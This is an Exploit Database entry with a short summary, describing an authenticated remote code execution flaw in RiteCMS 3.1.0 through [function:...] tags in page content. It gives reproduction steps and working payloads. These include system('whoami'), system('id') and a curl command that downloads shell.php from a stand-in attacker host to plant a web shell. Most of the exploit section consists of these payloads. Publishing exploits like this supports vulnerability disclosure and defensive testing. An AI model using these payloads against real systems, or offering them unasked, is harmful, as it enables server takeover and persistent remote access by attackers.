RiteCMS version 3.1.0 contains an authenticated Remote Code Execution vulnerability where a user with page-editing privileges can inject arbitrary PHP code via the `[function:...]` tag within page content, which is then evaluated by the `content_function()` handler. The article does not provide a CVSS score, a fixed version, or a specific workaround.
This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING RiteCMS 3.1.0 - Authenticated Remote Code Execution EDB-ID: 52488 CVE: N/A EDB Verified: Author: RED Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-04-06 Vulnerable App: # Exploit Title: RiteCMS 3.1.0 - Authenticated Remote Code Execution # Date: 2025-10-26 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://github.com/handylulu/RiteCMS # Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip # Version: 3.1.0 # Tested on: Windows XP ## Vulnerability Description RiteCMS v3.1.0 contains an authenticated Remote Code Execution (RCE) via its content_function() handler: [function:...] tags in page content are evaluated, allowing a user with page-editing privileges to execute arbitrary PHP on the server. ## Exploit Code Create or edit any page with the following content: [function:system('whoami')] ## Steps to Reproduce 1. Login as administrator 2. Create new page or edit existing page 3. Insert [function:system('whoami')] in content 4. Save and view page 5. Command output will be displayed ## additional payloads [function:system('curl http://attacker/shell.php -o shell.php')] [function:system('id')] Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.